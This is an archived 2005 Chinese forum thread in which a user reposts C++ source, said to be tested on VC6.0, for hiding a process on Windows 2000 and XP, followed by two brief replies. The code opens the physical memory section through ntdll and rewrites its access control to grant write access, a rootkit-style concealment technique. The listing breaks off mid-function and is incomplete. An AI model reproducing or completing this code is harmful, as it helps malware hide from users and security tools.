[分享]在2000和xp下，隐藏进程，VC6.0测试通过

奇奇发表于 2005-6-4 09:08:00

转载：<a href="http://bbs.end518.com" target="_blank" >http://bbs.end518.com</A> 最终技术网
头文件：
////////////////////////////////////// //HideProcess.h BOOL HideProcess();
 CPP源文件： ///////////////////////////////////////////////////////////////////////////// //HideProcess.cpp #include<windows.h> #include<Accctrl.h> #include<Aclapi.h>
#include"HideProcess.h"
#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK { NTSTATUS Status; ULONG Information; } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING;
#define OBJ_INHERIT 0x00000002L #define OBJ_PERMANENT 0x00000010L #define OBJ_EXCLUSIVE 0x00000020L #define OBJ_CASE_INSENSITIVE 0x00000040L #define OBJ_OPENIF 0x00000080L #define OBJ_OPENLINK 0x00000100L #define OBJ_KERNEL_HANDLE 0x00000200L #define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes );
typedef VOID (CALLBACK* RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString );
RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; OSVERSIONINFO g_osvi; //--------------------------------------------------------------------------- BOOL InitNTDLL() { g_hNtDLL = LoadLibrary("ntdll.dll");
 if (NULL == g_hNtDLL) return FALSE;
 RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, 
"RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
 return TRUE; } //--------------------------------------------------------------------------- VOID CloseNTDLL() { if(NULL != g_hNtDLL) FreeLibrary(g_hNtDLL);
 g_hNtDLL = NULL; } //--------------------------------------------------------------------------- VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) { PACL pDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, 
NULL, &pDacl, NULL, &pSD);
 if(ERROR_SUCCESS != dwRes) {
 if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); }
 EXPLICIT_ACCESS ea; RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance= NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; 
 dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl); if(ERROR_SUCCESS != dwRes) {
 if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } dwRes = SetSecurityInfo
(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NU

showtime 发表于 2005-8-11 03:10:00

头晕眼花

showtime 发表于 2005-8-11 03:11:00

你不会吗~~~
而且麻烦

页: [1]

惠安学生网's Archiver

[分享]在2000和xp下，隐藏进程，VC6.0测试通过